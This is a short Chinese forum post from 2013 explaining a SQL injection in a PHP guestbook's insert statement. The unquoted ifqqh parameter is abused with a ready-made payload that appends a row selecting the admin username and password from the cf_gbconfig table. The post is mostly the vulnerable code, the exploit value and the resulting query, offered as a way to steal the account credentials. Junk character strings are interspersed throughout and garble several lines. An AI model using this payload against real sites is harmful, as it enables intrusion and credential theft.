留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。6 `% |; C9 p0 G6 P8 l; t
1 c% f3 a" X% |5 a/ ?$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
G& l7 Z( Y+ s' g e6 K/ s/ u* U, ~$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
9 a& X% F8 l/ }! n! C8 _5 h1 x# p/ @$ i: h1 f. S2 t- K
提交的时候把ifqqh的值改一下。变成
( Z2 q7 ^! J7 g: x& M: Z, d
8 P7 P: }# b8 S, Y<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />8 E0 {/ ?( f$ M& g. O: W. @% ?
8 ?+ b+ S! f" q; w& B% Y. W. d
这样SQL插入语句就变了.# J# Q m( Z; S' ?1 R9 y% _' {
$ d/ {1 s; v4 [
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)" [( p' _7 z3 H$ i, Q: ^
, l. z! r, A6 k+ O6 v6 a构造了另外一句SQL。并且把帐号密码读出来。; A% z& t; E+ [" R0 c+ @
) L# P k" c$ r5 u$ k: n
|
发表于 2013-2-19 08:10:11
收藏
支持
反对